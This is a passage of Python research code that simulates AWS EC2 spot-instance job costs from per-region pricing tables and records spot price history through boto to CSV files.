hourly_series[:-1].sum()\n\n # If the user ran residual time without interrupt after last hour\n if not interrupted:\n total_cost += hourly_series[-1]\n\n # Return the total cost\n return total_cost\n\n\n# Lookup tables for pricing for EBS\ndef get_ec2_costs(av_zone, cost_type):\n '''\n Function to retrieve costs associated with using EC2\n\n Data transfer into EC2 from the internet is free (all regions)\n\n Region name - Location mapping\n ------------------------------\n us-east-1 - N. Virginia\n us-west-1 - N. 
California\n us-west-2 - Oregon\n eu-west-1 - Ireland\n eu-central-1 - Frankfurt\n ap-southeast-1 - Singapore\n ap-southeast-2 - Sydney\n ap-northeast-1 - Tokyo\n sa-east-1 - Sao Paulo\n\n References\n ----------\n EC2 pricing: http://aws.amazon.com/ec2/pricing/\n EBS pricing: http://aws.amazon.com/ebs/pricing/\n\n Parameters\n ----------\n av_zone : string\n the availability zone to get the pricing info for\n cost_type : string\n the type of cost to extract, supported types include:\n 'ssd' - ssd EC2 EBS storage\n 'mag' - magnetic EC2 EBS storage\n 'xfer' - download from EC2 transfer costs\n 'master' - t2.small hourly on-demand cost\n\n Returns\n -------\n ec2_cost : float\n the $ amount per unit of the cost type of interest\n '''\n\n # Init variables\n region = av_zone[:-1]\n\n # EBS general purpose storage\n ebs_gen_purp = {'us-east-1' : 0.1,\n 'us-west-1' : 0.12,\n 'us-west-2' : 0.1,\n 'eu-west-1' : 0.11,\n 'eu-central-1' : 0.119,\n 'ap-southeast-1' : 0.12,\n 'ap-southeast-2' : 0.12,\n 'ap-northeast-1' : 0.12,\n 'sa-east-1' : 0.19}\n\n # EBS magnetic storage (plus same price per million I/O requests)\n ebs_mag = {'us-east-1' : 0.05,\n 'us-west-1' : 0.08,\n 'us-west-2' : 0.05,\n 'eu-west-1' : 0.055,\n 'eu-central-1' : 0.059,\n 'ap-southeast-1' : 0.08,\n 'ap-southeast-2' : 0.08,\n 'ap-northeast-1' : 0.08,\n 'sa-east-1' : 0.12}\n\n # Get costs for downloading data from EC2 (up to 10TB/month), in $/GB\n ec2_xfer_out = {'us-east-1' : 0.09,\n 'us-west-1' : 0.09,\n 'us-west-2' : 0.09,\n 'eu-west-1' : 0.09,\n 'eu-central-1' : 0.09,\n 'ap-southeast-1' : 0.12,\n 'ap-southeast-2' : 0.14,\n 'ap-northeast-1' : 0.14,\n 'sa-east-1' : 0.25}\n\n # Get $/hour costs of running t2.small master node\n ec2_t2_small = {'us-east-1' : 0.026,\n 'us-west-1' : 0.034,\n 'us-west-2' : 0.026,\n 'eu-west-1' : 0.028,\n 'eu-central-1' : 0.030,\n 'ap-southeast-1' : 0.040,\n 'ap-southeast-2' : 0.040,\n 'ap-northeast-1' : 0.040,\n 'sa-east-1' : 0.054}\n\n # Select costs type\n if cost_type == 'ssd':\n ec2_cost = ebs_gen_purp[region]\n elif cost_type == 'mag':\n ec2_cost = ebs_mag[region]\n elif cost_type == 'xfer':\n ec2_cost = ec2_xfer_out[region]\n elif cost_type == 'master':\n ec2_cost = ec2_t2_small[region]\n else:\n err_msg = 'cost_type argument does not support %s' % cost_type\n raise Exception(err_msg)\n\n # Return the ec2 cost\n return ec2_cost\n\n\n# Lookup tables for pricing for EBS\ndef get_s3_costs(av_zone, cost_type):\n '''\n Data transfer to S3 from anywhere is free (all regions)\n Data transfer from S3 to EC2 in same region is free (all regions)\n\n Parameters\n ----------\n av_zone : string\n the availability zone to get the pricing info for\n cost_type : string\n the type of cost to extract, supported types include:\n 'stor' - S3 standard storage per-GB-month\n 'xfer' - download from S3 transfer costs\n 'req' - bucket key requests cost\n\n Returns\n -------\n s3_price : float\n the $ amount per unit of the cost type of interest\n\n References\n ----------\n S3 pricing: http://aws.amazon.com/s3/pricing/\n '''\n\n # Init variables\n region = av_zone[:-1]\n\n # S3 standard storage (up to 1TB/month), units of $/GB-month\n s3_stor = {'us-east-1' : 0.03,\n 'us-west-1' : 0.033,\n 'us-west-2' : 0.03,\n 'eu-west-1' : 0.03,\n 'eu-central-1' : 0.0324,\n 'ap-southeast-1' : 0.03,\n 'ap-southeast-2' : 0.033,\n 'ap-northeast-1' : 0.033,\n 'sa-east-1' : 0.0408}\n\n # Get costs for downloading data from S3 (up to 10TB/month), in $/GB\n s3_xfer_out = {'us-east-1' : 0.09,\n 'us-west-1' : 0.09,\n 'us-west-2' : 0.09,\n 
'eu-west-1' : 0.09,\n 'eu-central-1' : 0.09,\n 'ap-southeast-1' : 0.12,\n 'ap-southeast-2' : 0.14,\n 'ap-northeast-1' : 0.14,\n 'sa-east-1' : 0.25}\n\n # Request pricing (put vs get on S3)\n # Put - $/1,000 reqs (upload)\n # Get - $/10,000 reqs (download)\n s3_reqs = {'us-east-1' : {'put' : 0.005, 'get' : 0.004},\n 'us-west-1' : {'put' : 0.0055, 'get' : 0.0044},\n 'us-west-2' : {'put' : 0.005, 'get' : 0.004},\n 'eu-west-1' : {'put' : 0.005, 'get' : 0.004},\n 'eu-central-1' : {'put' : 0.0054, 'get' : 0.0043},\n 'ap-southeast-1' : {'put' : 0.005, 'get' : 0.004},\n 'ap-southeast-2' : {'put' : 0.0055, 'get' : 0.0044},\n 'ap-northeast-1' : {'put' : 0.0047, 'get' : 0.0037},\n 'sa-east-1' : {'put' : 0.007, 'get' : 0.0056}}\n\n # Select costs type\n if cost_type == 'stor':\n s3_cost = s3_stor[region]\n elif cost_type == 'xfer':\n s3_cost = s3_xfer_out[region]\n elif cost_type == 'req':\n s3_cost = s3_reqs[region]\n else:\n err_msg = 'cost_type argument does not support %s' % cost_type\n raise Exception(err_msg)\n\n # Return the ec2 cost\n return s3_cost\n\n\n# Find how often a number of jobs fails and its total cost\ndef simulate_market(start_time, spot_history, interp_history,\n proc_time, num_iter, bid_price):\n '''\n Function to find the total execution time, cost, and number of interrupts\n for a given job submission and bid price\n\n Parameters\n ----------\n start_time : pandas.tslib.Timestamp object\n the time to start the simulation from\n spot_history : pandas.core.series.Series object\n timeseries of spot prices recorded from AWS\n interp_history : pandas.core.series.Series object\n interpolated spot price history to one second resolution\n proc_time : float\n the time to process one job iteration (in seconds)\n num_iter : integer\n the number of job iterations or waves to run\n bid_price : float\n the spot bid price in dollars per hour\n\n Returns\n -------\n total_runtime : float\n the total number of seconds all of the nodes were up running\n total_wait : float\n the total number of seconds spent waiting for the spot price\n to come down below bid\n total_cost : float\n the per-node running, or instance, cost\n num_interrupts : integer\n the number of times the job submission was interrupted\n first_iter_time : float\n the number of seconds the first job iteration took to complete;\n this is used to model when outputs begin downloading from EC2\n '''\n\n # Import packages\n import datetime\n import numpy as np\n\n # Init variables\n total_runtime = 0\n total_wait = 0\n total_cost = 0\n num_interrupts = 0\n\n # Get first spot history start time\n # Note: np.argmax returns first occurence of True\n start_idx = np.argmax(spot_history.index >= start_time)\n spot_history_start = spot_history.index[start_idx]\n\n # Init remaining rumtime\n remaining_runtime = proc_time*num_iter\n\n # Init 1st iteration time\n first_iter_flg = False\n first_iter_time = 0\n\n # While there is time left running\n while remaining_runtime > 0:\n # Get only current spot history\n curr_spot_history = spot_history[spot_history_start:]\n\n # Get instance-boot-up price (per hour price at start time)\n start_price = interp_history[start_time]\n\n # If start price is greater than bid, interrupt immediately\n if start_price >= bid_price:\n uptime_seconds = 0\n interrupt_time = start_time\n # Otherwise, start instances\n else:\n # Find interrupts\n interrupt_condition = curr_spot_history >= bid_price\n\n # Find timestamp where first interrupt occured\n if np.any(interrupt_condition):\n interrupt_time = 
min(curr_spot_history.index[interrupt_condition])\n else:\n interrupt_time = spot_history.index[-1]\n\n # Calculate total up-and-running time\n uptime = interrupt_time - start_time\n uptime_seconds = uptime.total_seconds()\n\n # See if job completed\n if uptime_seconds > remaining_runtime:\n\n # Add remaining runtime to execution time\n total_runtime += remaining_runtime\n\n # Add remaining runtime costs\n total_cost += calculate_cost(start_time, remaining_runtime, interp_history)\n\n # Clear remaining run time\n remaining_runtime = 0\n\n # Job suspended until price returns below bid\n else:\n # Increment it as an interrupt if we were running beforehand\n if uptime_seconds > 0:\n num_interrupts += 1\n\n # Add up time to execution time\n total_runtime += uptime_seconds\n\n # Add to cost\n total_cost += calculate_cost(start_time, uptime_seconds,\n interp_history, interrupted=True)\n\n # Subtract uptime from remaining runtime\n # Add back remainder of time that was interrupted (need to re-do)\n remaining_runtime = (remaining_runtime-uptime_seconds) + \\\n (uptime_seconds % proc_time)\n\n # Find next time the history dips below the bid price\n curr_spot_history = spot_history[interrupt_time:]\n start_condition = curr_spot_history < bid_price\n start_times = curr_spot_history.index[start_condition]\n\n # If we've run out of processing time\n if len(start_times) == 0 or \\\n start_times[0] == spot_history.index[-1]:\n err_msg = 'Job submission could not complete due to too many ' \\\n 'interrupts or starting too recently'\n raise Exception(err_msg)\n\n # Get the next time we can start\n spot_history_start = min(start_times)\n # and set as the next spot time\n start_time = spot_history_start\n\n # And increment wait time by (next start)-(this interrupt)\n total_wait += (start_time - interrupt_time).total_seconds()\n\n # Check to see if we're setting first iter\n if not first_iter_flg:\n # If we were up for at least one amount of processing time\n if total_runtime >= proc_time:\n first_iter_time = proc_time + total_wait\n first_iter_flg = True\n\n # Return results\n return total_runtime, total_wait, total_cost, num_interrupts, first_iter_time\n\n\n# Return a time series from csv data frame\ndef spothistory_from_dataframe(csv_file, instance_type, product, av_zone):\n '''\n Function to return a time and price series from a csv dataframe\n\n Parameters\n ----------\n csv_file : string\n file path to dataframe csv file\n instance_type : string\n the type of instance to gather spot history for\n product : string\n the type of OS product to gather spot history for\n av_zone : string\n the availability zone to get the pricing info for\n\n Returns\n -------\n spot_history : pandas.Series\n time series of spot history prices indexed by timestamp\n '''\n\n # Import packages\n import dateutil.parser\n import pandas as pd\n\n # Init variables\n\n # Load data frame\n print 'Loading dataframe %s...' 
% csv_file\n data_frame = pd.DataFrame.from_csv(csv_file)\n\n # Get only entries we care about\n df_bool = (data_frame['Instance type'] == instance_type) & \\\n (data_frame['Product'] == product) & \\\n (data_frame['Availability zone'] == av_zone)\n df_subset = data_frame[df_bool]\n\n # Get spot histories from data frame with str timestamps\n spot_history = df_subset.set_index('Timestamp')['Spot price']\n spot_history = spot_history.sort_index()\n\n # Get new histories with datetime timestamps\n datetimes = [dateutil.parser.parse(ts) for ts in spot_history.index]\n spot_history = pd.Series(spot_history.values, datetimes)\n\n # Return time series\n return spot_history\n\n\n# Main routine\ndef main(sim_dir, proc_time, num_jobs, jobs_per, in_gb, out_gb, out_gb_dl,\n up_rate, down_rate, bid_ratio, instance_type, av_zone, product,\n csv_file=None):\n '''\n Function to calculate spot instance run statistics based on job\n submission parameters; this function will save the statistics and\n specific spot history in csv dataframes to execution directory\n\n Parameters\n ----------\n sim_dir : string\n base directory where to create the availability zone folders\n for storing the simulation results\n proc_time : float\n the number of minutes a single job of interest takes to run\n num_jobs : integer\n total number of jobs to run to complete job submission\n jobs_per : integer\n the number of jobs to run per node\n in_gb : float\n the total amount of input data for a particular job (in GB)\n out_gb : float\n the total amount of output data from a particular job (in GB)\n out_gb_dl : float\n the total amount of output data to download from EC2 (in GB)\n up_rate : float\n the average upload rate to transfer data to EC2 (in Mb/s)\n down_rate : float\n the average download rate to transfer data from EC2 (in Mb/s)\n bid_ratio : float\n the ratio to average spot history price to set the bid price to\n instance_type : string\n type of instance to run the jobs on and to get spot history for\n av_zone : string\n the AWS EC2 availability zone (sub-region) to get spot history\n from\n product : string\n the type of operating system product to get spot history for\n csv_file : string (optional), default is None\n the filepath to a csv dataframe to get spot history from;\n if not specified, the function will just get the most recent 90\n days worth of spot price history\n\n Returns\n -------\n spot_history : pd.DataFrame object\n in addition to saving this as './spot_history.csv' the\n dataframe can also be returned as an object in memory\n stat_df : pd.DataFrame object\n in addition to saving this as './<info>_stats.csv' the\n dataframe can also be returned as an object in memory\n '''\n\n # Import packages\n import dateutil\n import logging\n import numpy as np\n import os\n import pandas as pd\n import yaml\n\n # Import local packages\n import utils\n from record_spot_price import return_spot_history\n\n # Init variables\n proc_time *= 60.0\n num_nodes = min(np.ceil(float(num_jobs)/jobs_per), 20)\n\n # Init simulation market results dataframe\n sim_df_cols = ['start_time', 'spot_hist_csv', 'proc_time', 'num_datasets',\n 'jobs_per_node', 'num_jobs_iter', 'bid_ratio', 'bid_price',\n 'median_history', 'mean_history', 'stdev_history',\n 'compute_time', 'wait_time', 'per_node_cost',\n 'num_interrupts', 'first_iter_time']\n sim_df = pd.DataFrame(columns=sim_df_cols)\n\n # Init full run stats data frame\n stat_df_cols = ['Total cost', 'Instance cost', 'Storage cost', 'Tranfer cost',\n 'Total time', 'Run time', 'Wait 
time',\n 'Upload time', 'Download time']\n stat_df = pd.DataFrame(columns=stat_df_cols)\n\n # Set up logger\n base_dir = os.path.join(sim_dir, av_zone)\n if not os.path.exists(base_dir):\n try:\n os.makedirs(base_dir)\n except OSError as exc:\n print 'Found av zone directory %s, continuing...' % av_zone\n log_path = os.path.join(base_dir, '%s_%d-jobs_%.3f-bid.log' % \\\n (instance_type, num_jobs, bid_ratio))\n stat_log = utils.setup_logger('stat_log', log_path, logging.INFO, to_screen=True)\n\n # Check to see if simulation was already run (sim csv file exists)\n sim_csv = os.path.join(base_dir, '%s_%d-jobs_%.3f-bid_sim.csv' % \\\n (instance_type, num_jobs, bid_ratio))\n if os.path.exists(sim_csv):\n stat_log.info('Simulation file %s already exists, skipping...' % sim_csv)\n return\n\n # Calculate number of iterations given run configuration\n # Round up and assume that we're waiting for all jobs to finish\n # before terminating nodes\n num_iter = np.ceil(num_jobs/float((jobs_per*num_nodes)))\n stat_log.info('With %d jobs, %d nodes, and %d jobs running per node...\\n' \\\n 'job iterations: %d' % (num_jobs, num_nodes, jobs_per, num_iter))\n\n # Get spot price history, if we're getting it from a csv dataframe\n if csv_file:\n # Parse dataframe to form history\n spot_history = spothistory_from_dataframe(csv_file, instance_type,\n product, av_zone)\n # Get rid of any duplicated timestamps\n spot_history = spot_history.groupby(spot_history.index).first()\n\n # Otherwise, just grab latest 90 days\n else:\n sh_list = return_spot_history(None, instance_type, product, av_zone)\n\n # Convert history into just timepoints and prices list of tuples\n timestamps = [dateutil.parser.parse(sh.timestamp) for sh in sh_list]\n prices = [sh.price for sh in sh_list]\n\n # Use pandas timeseries and sort in oldest -> newest\n spot_history = pd.Series(prices, timestamps)\n spot_history = spot_history.sort_index()\n\n # Write spot history to disk\n sh_csv = os.path.join(os.getcwd(), 'spot_history.csv')\n spot_history.to_csv(sh_csv)\n\n # Get interpolated times per second (forward fill)\n interp_seq = pd.date_range(spot_history.index[0], spot_history.index[-1],\n freq='S')\n interp_history = spot_history.reindex(interp_seq)\n interp_history = interp_history.fillna(method='ffill')\n\n # Init simulation time series\n sim_seq = pd.date_range(interp_seq[0], interp_seq[-1], freq='20T')\n sim_series = interp_history[sim_seq]\n\n # Init loop variables\n sim_idx = 0\n sim_length = len(sim_series)\n beg_time = spot_history.index[0]\n end_time = spot_history.index[-1]\n time_needed = num_iter*(proc_time)\n\n # Get bid price\n spot_history_avg = interp_history.mean()\n bid_price = bid_ratio*spot_history_avg\n stat_log.info('Spot history average is $%.3f, bid ratio of %.3fx sets ' \\\n 'bid to $%.3f' % (spot_history_avg, bid_ratio, bid_price))\n\n # Iterate through the interpolated timeseries\n for start_time, start_price in sim_series.iteritems():\n # First see if there's enough time to run jobs\n # (later start times have even smaller windows, so stop here)\n time_window = (end_time-start_time).total_seconds()\n if time_needed > time_window:\n stat_log.info('Total runtime exceeds time window, ending simulation...')\n break\n\n # Simulate running job and get stats from that start time\n try:\n run_time, wait_time, pernode_cost, num_interrupts, first_iter_time = \\\n simulate_market(start_time, spot_history, interp_history,\n proc_time, num_iter, bid_price)\n except Exception as exc:\n stat_log.info('Could not run full simulation because of:\\n%s' % exc)\n continue\n\n # Write simulate market output to dataframe\n # (order matches sim_df_cols: median_history, mean_history, stdev_history)\n sim_df.loc[sim_idx] = [start_time, csv_file, proc_time, num_jobs,\n jobs_per, num_iter, bid_ratio, bid_price,\n np.median(spot_history), np.mean(spot_history),\n np.std(spot_history), run_time, wait_time,\n pernode_cost, num_interrupts, first_iter_time]\n\n # Get complete time and costs from spot market simulation parameters\n total_cost, instance_cost, stor_cost, xfer_cost, \\\n total_time, run_time, wait_time, \\\n xfer_up_time, xfer_down_time = \\\n calc_ebs_model_costs(run_time, wait_time, pernode_cost,\n first_iter_time, num_jobs, num_nodes,\n jobs_per, av_zone, in_gb, out_gb,\n out_gb_dl, up_rate, down_rate)\n\n # Add to output dataframe\n stat_df.loc[sim_idx] = [total_cost, instance_cost, stor_cost, xfer_cost,\n total_time/60.0, run_time/60.0, wait_time/60.0,\n xfer_up_time/60.0, xfer_down_time/60.0]\n\n # Print stats\n stat_log.info('Total cost: $%.3f' % total_cost)\n stat_log.info('Total time (minutes): %.3f' % (total_time/60.0))\n stat_log.info('run time (minutes): %.3f' % (run_time/60.0))\n stat_log.info('per-node cost: $%.3f' % pernode_cost)\n stat_log.info('number of interrupts: %d' % num_interrupts)\n stat_log.info('wait time (minutes): %.3f' % (wait_time/60.0))\n\n sim_idx += 1\n utils.print_loop_status(sim_idx, sim_length)\n\n # Add configuration parameters to dataframe\n sim_df['av_zone'] = av_zone\n sim_df['in_gb'] = in_gb\n sim_df['out_gb'] = out_gb\n sim_df['out_gb_dl'] = out_gb_dl\n sim_df['up_rate'] = up_rate\n sim_df['down_rate'] = down_rate\n\n # Write simulation dataframe to disk\n sim_df.to_csv(sim_csv)\n\n # Write stats dataframe to disk\n stat_csv = os.path.join(base_dir, '%s_%d-jobs_%.3f-bid_stats.csv' % \\\n (instance_type, num_jobs, bid_ratio))\n stat_df.to_csv(stat_csv)\n\n # Write parameters yaml to disk\n params_yml = os.path.join(base_dir, '%s_%d-jobs_%.3f-bid_params.yml' % \\\n (instance_type, num_jobs, bid_ratio))\n\n params = {'proc_time' : proc_time,\n 'num_jobs' : num_jobs,\n 'jobs_per' : jobs_per,\n 'in_gb' : in_gb,\n 'out_gb' : out_gb,\n 'out_gb_dl' : out_gb_dl,\n 'up_rate' : up_rate,\n 'down_rate' : down_rate,\n 'bid_ratio' : bid_ratio,\n 'instance_type' : instance_type,\n 'av_zone' : av_zone,\n 'product' : product,\n 'csv_file' : csv_file}\n\n with open(params_yml, 'w') as y_file:\n y_file.write(yaml.dump(params))\n\n # Give simulation-wide statistics\n interrupt_avg = sim_df['num_interrupts'].mean()\n time_avg = stat_df['Total time'].mean()\n cost_avg = stat_df['Total cost'].mean()\n\n # Print simulation statistics\n stat_log.info('\\n' + 72*'-')\n stat_log.info('Submission of %d job iterations, ' \\\n 'each takes %.3f mins to run:' % (num_iter, proc_time/60.0))\n stat_log.info('Average spot history price for %s in %s\\n' \\\n 'between %s and %s is: $%.3f' % \\\n (instance_type, av_zone, beg_time, end_time, spot_history_avg))\n stat_log.info('Spot ratio of %.3fx the average price set bid to $%.3f' % \\\n (bid_ratio, bid_price))\n stat_log.info('Average total time (mins): %f' % time_avg)\n stat_log.info('Average total cost: $%.3f' % cost_avg)\n stat_log.info('Average number of interruptions: %.3f' % interrupt_avg)\n stat_log.info(72*'-' + '\\n')\n\n # Return dataframes\n return spot_history, sim_df, stat_df\n\n\n# Make executable\nif __name__ == '__main__':\n\n # Import packages\n import argparse\n\n # Init argparser\n parser = argparse.ArgumentParser(description=__doc__)\n\n # Required arguments\n parser.add_argument('-t', '--proc_time', nargs=1, required=True,\n type=float, help='Processing time for one job to complete '\\\n 
'successfully (in minutes)')\n parser.add_argument('-j', '--num_jobs', nargs=1, required=True, type=int,\n help='Total number of jobs to run in AWS')\n parser.add_argument('-per', '--jobs_per', nargs=1, required=True, type=int,\n help='Number of jobs to run per node')\n parser.add_argument('-ig', '--in_gb', nargs=1, required=True, type=float,\n help='Input size per job in GB to upload to EC2')\n parser.add_argument('-og', '--out_gb', nargs=1, required=True, type=float,\n help='Output size per job in GB to store in EC2 EBS')\n parser.add_argument('-od', '--out_gb_dl', nargs=1, required=True, type=float,\n help='Output size per job in GB to download from EC2')\n parser.add_argument('-ur', '--up_rate', nargs=1, required=True, type=float,\n help='Upload rate in Mb/sec')\n parser.add_argument('-dr', '--down_rate', nargs=1, required=True, type=float,\n help='Download rate in Mb/sec')\n parser.add_argument('-b', '--bid_ratio', nargs=1, required=True,\n type=float, help='Bid ratio to average spot price')\n parser.add_argument('-i', '--instance_type', nargs=1, required=True,\n type=str, help='Instance type to run the jobs on')\n\n # Optional arguments\n parser.add_argument('-z', '--av_zone', nargs=1, required=False, type=str,\n help='Specify availability zone of interest; ' \\\n 'default is \\'us-east-1b\\'')\n parser.add_argument('-p', '--product', nargs=1, required=False, type=str,\n help='Specify product of interest; ' \\\n 'default is \\'Linux/Unix\\'')\n parser.add_argument('-c', '--csv_file', nargs=1, required=False, type=str,\n help='Specify csv dataframe to parse histories')\n\n # Parse arguments\n args = parser.parse_args()\n\n # Init variables\n # Pipeline config params\n proc_time = args.proc_time[0]\n num_jobs = args.num_jobs[0]\n # Cluster config params\n jobs_per = args.jobs_per[0]\n instance_type = args.instance_type[0]\n # Data in/out to store EBS\n in_gb = args.in_gb[0]\n out_gb = args.out_gb[0]\n # Data transfer\n out_gb_dl = args.out_gb_dl[0]\n up_rate = args.up_rate[0]\n down_rate = args.down_rate[0]\n # Bid ratio\n bid_ratio = args.bid_ratio[0]\n\n # Try and init optional arguments\n try:\n av_zone = args.av_zone[0]\n except TypeError as exc:\n av_zone = 'us-east-1b'\n print 'No availability zone argument found, using %s...' % av_zone\n try:\n product = args.product[0]\n except TypeError as exc:\n product = 'Linux/UNIX'\n print 'No product argument found, using %s...' 
% product\n try:\n csv_file = args.csv_file[0]\n except TypeError as exc:\n csv_file = None\n print 'No csv dataframe specified, only using latest history...'\n\n # Call main routine\n # Note: main() expects the simulation output directory as its first\n # argument; the CLI does not expose it, so default to the current\n # working directory here\n import os\n sim_dir = os.getcwd()\n main(sim_dir, proc_time, num_jobs, jobs_per, in_gb, out_gb, out_gb_dl,\n up_rate, down_rate, bid_ratio, instance_type, av_zone, product,\n csv_file)\n" }, { "alpha_fraction": 0.5932673811912537, "alphanum_fraction": 0.6008155345916748, "avg_line_length": 31.285715103149414, "blob_id": "9146da7988f25381933dcaf7b93241fa20a69295", "content_id": "bf0edf46f0f7709c6fa09bd9e7583620def4a5d4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11526, "license_type": "permissive", "max_line_length": 85, "num_lines": 357, "path": "/spot-model/record_spot_price.py", "repo_name": "computational-neuroimaging-lab/Clark2015_AWS", "src_encoding": "UTF-8", "text": "# record_spot_price.py\n#\n# Author: Daniel Clark, 2015\n\n'''\nThis module records the spot price from AWS EC2 continuously and saves\nthe information to dataframes as csv files to an output directory\n\nUsage:\n python record_spot_price.py -o <out_dir> -n <num_cores>\n'''\n\n# Initialize categorical variables for spot price history\ndef init_categories():\n '''\n Function that initializes and returns ec2 instance categories\n\n Parameters\n ----------\n None\n\n Returns\n -------\n instance_types : list\n a list of strings containing the various types of instances\n product_descriptions : list\n a list of strings containing the different ec2 OS products\n '''\n\n # Init variables\n instance_types = ['t2.micro', 't2.small', 't2.medium',\n 'm3.medium', 'm3.large', 'm3.xlarge', 'm3.2xlarge',\n 'c4.large', 'c4.xlarge', 'c4.2xlarge', 'c4.4xlarge',\n 'c4.8xlarge', 'c3.large', 'c3.xlarge', 'c3.2xlarge',\n 'c3.4xlarge', 'c3.8xlarge', 'r3.large', 'r3.xlarge',\n 'r3.2xlarge', 'r3.4xlarge', 'r3.8xlarge',\n 'i2.xlarge', 'i2.2xlarge', 'i2.4xlarge', 'i2.8xlarge',\n 'd2.xlarge', 'd2.2xlarge', 'd2.4xlarge', 'd2.8xlarge',\n 'g2.2xlarge', 'g2.8xlarge']\n product_descriptions = ['Linux/UNIX', 'SUSE Linux',\n 'Linux/UNIX (Amazon VPC)', 'SUSE Linux (Amazon VPC)']\n\n # Return variables\n return instance_types, product_descriptions\n\n\n# Get availability zones\ndef return_av_zones(region):\n '''\n Function to get a list of the availability zones as strings\n\n Parameters\n ----------\n region : boto.regioninfo.RegionInfo object\n the region object to get the zones from\n\n Returns\n -------\n av_zones : list\n a list of strings of the availability zone names\n '''\n\n # Import packages\n import boto\n import boto.ec2\n from CPAC.AWS import fetch_creds\n\n # Init variables\n creds_path = '/home2/dclark/secure-creds/aws-keys/dclark_cmi/dclark_cmi_keys.csv'\n aws_sak, aws_aki = fetch_creds.return_aws_keys(creds_path)\n ec2_conn = boto.connect_ec2(aws_sak, aws_aki, region=region)\n av_zones = ec2_conn.get_all_zones()\n\n # Get names as strings\n av_zones = [str(av_zone.name) for av_zone in av_zones]\n\n # Return list of availability zones\n return av_zones\n\n\n# Return the spot history dataframe for certain categories\ndef return_sh_df(start_time, instance_type, product, region):\n '''\n Function to return the spot prices and timestamps\n '''\n\n # Import packages\n import pandas as pd\n\n # Init variables\n df_cols = ['Instance type', 'Product', 'Region', 'Availability zone',\n 'Spot price', 'Timestamp']\n new_df = pd.DataFrame(columns=df_cols)\n\n # Get spot history\n sh_list = return_spot_history(start_time, instance_type, 
product, region)\n\n # Populate new dataframe\n for idx, sh_record in enumerate(sh_list):\n df_entry = [str(sh_record.instance_type),\n str(sh_record.product_description),\n str(sh_record.region.name),\n str(sh_record.availability_zone),\n sh_record.price, str(sh_record.timestamp)]\n new_df.loc[idx] = df_entry\n\n # Return new dataframe\n return new_df\n\n\n# Return a list of spot price histories\ndef return_spot_history(start_time, instance_type, product, region):\n '''\n Function to return a list of SpotPriceHistory objects\n\n Parameters\n ----------\n start_time : string\n the start time of interest to begin collecting histories\n instance_type : string\n the type of interest to collect the histories for\n product : string\n the OS product platform to collect histories for\n region : boto.regioninfo.RegionInfo object\n the region object to get the zones from\n\n Returns\n -------\n full_sh_list : list\n a list of boto.ec2.spotpricechistory.SpotPriceHistory objects;\n each object contains price, timestamp, and other information\n '''\n\n # Import packages\n import boto\n import boto.ec2\n import logging\n from boto.exception import BotoServerError\n\n from CPAC.AWS import fetch_creds\n\n # Init variables\n creds_path = '/home2/dclark/secure-creds/aws-keys/dclark_cmi/dclark_cmi_keys.csv'\n full_sh_list = []\n\n # Grab region of interest and connect to ec2 in that region\n aws_sak, aws_aki = fetch_creds.return_aws_keys(creds_path)\n ec2_conn = boto.connect_ec2(aws_sak, aws_aki, region=region)\n\n # Get logger\n sh_log = logging.getLogger('sh_log')\n\n # Iterate over all the availability zones\n av_zones = return_av_zones(region)\n num_zones = len(av_zones)\n for av_idx, av_zone in enumerate(av_zones):\n sh_log.info('Getting history for %d/%d: %s...' \\\n % (av_idx+1, num_zones, av_zone))\n # While the token flag indicates to more data\n token_flg = True\n next_token = None\n while token_flg:\n # Grab batch of histories\n try:\n sh_list = \\\n ec2_conn.get_spot_price_history(start_time=start_time,\n instance_type=instance_type,\n product_description=product,\n availability_zone=av_zone,\n next_token=next_token)\n # Grab next token for next batch of histories\n next_token = sh_list.nextToken\n except BotoServerError as exc:\n sh_log.info('Could not access any further histories.\\nError: %s' \\\n % exc.message)\n token_flg = False\n\n # Update list if it has elements and log\n if len(sh_list) > 0:\n first_ts = str(sh_list[0].timestamp)\n last_ts = str(sh_list[-1].timestamp)\n sh_log.info('Appending to list: %s - %s' % (first_ts, last_ts))\n full_sh_list.extend(sh_list)\n else:\n sh_log.info('Found no spot history in %s, moving on...' 
% av_zone)\n\n # Check if list is still returning 1000 objects\n if len(sh_list) != 1000:\n token_flg = False\n\n # Return full spot history list\n return full_sh_list\n\n\n# Function to get the spot_history and save to csv dataframe\ndef get_df_and_save(start_time, instance_type, product, region, out_dir):\n '''\n Function to get the dataframe for a particular instance type,\n product, and region starting as far back as possible\n\n Parameters\n ----------\n start_time : string\n the start time of interest to begin collecting histories\n instance_type : string\n the type of interest to collect the histories for\n product : string\n the OS product platform to collect histories for\n region : boto.regioninfo.RegionInfo object\n the region object to get the zones from\n '''\n\n # Import packages\n import datetime\n import logging\n import os\n\n # Init variables\n now_date = datetime.datetime.now()\n log_month = now_date.strftime('%m-%Y')\n\n # Get logger\n sh_log = logging.getLogger('sh_log')\n\n # Check to see if folder needs to be created\n out_csv = os.path.join(out_dir, log_month, str(region.name),\n product.replace('/', '-'),\n instance_type + '.csv')\n if os.path.exists(out_csv):\n sh_log.info('%s already exists, skipping...' % out_csv)\n return\n\n csv_dir = os.path.dirname(out_csv)\n if not os.path.exists(csv_dir):\n os.makedirs(csv_dir)\n\n # Grab the spot history\n df = return_sh_df(start_time, instance_type, product, region)\n\n # Save the dataframe\n df.to_csv(out_csv)\n\n\n# Main routine\ndef main(out_dir, num_cores):\n '''\n Function to fetch the latest spot history from AWS and store in a\n dataframe saved to a local csv file for every availability zone\n\n Parameters\n ----------\n out_dir : string\n base file directory to store the spot history dataframes\n num_cores: integer\n number of cores to use\n '''\n\n # Import packages\n import boto\n import datetime\n import logging\n import os\n import pandas as pd\n from multiprocessing import Process\n from CPAC.AWS import fetch_creds\n\n # Import local packages\n import utils\n\n # Init variables\n proc_list = []\n out_csvs = []\n df_list = []\n creds_path = '/home2/dclark/secure-creds/aws-keys/dclark_cmi/dclark_cmi_keys.csv'\n\n # Set up logger\n now_date = datetime.datetime.now()\n log_month = now_date.strftime('%m-%Y')\n log_path = os.path.join(out_dir, 'spot_history_'+log_month+'.log')\n\n sh_log = utils.setup_logger('sh_log', log_path, logging.INFO, to_screen=True)\n\n # Get list of regions\n aws_sak, aws_aki = fetch_creds.return_aws_keys(creds_path)\n reg_conn = boto.connect_ec2(aws_sak, aws_aki)\n regions = reg_conn.get_all_regions()\n reg_conn.close()\n\n # Init categories to iterate through\n instance_types, product_descriptions = init_categories()\n\n # Form a list of the combinations of instance types and products\n instance_products = [(inst_type, prod) for inst_type in instance_types \\\n for prod in product_descriptions]\n\n # Get total 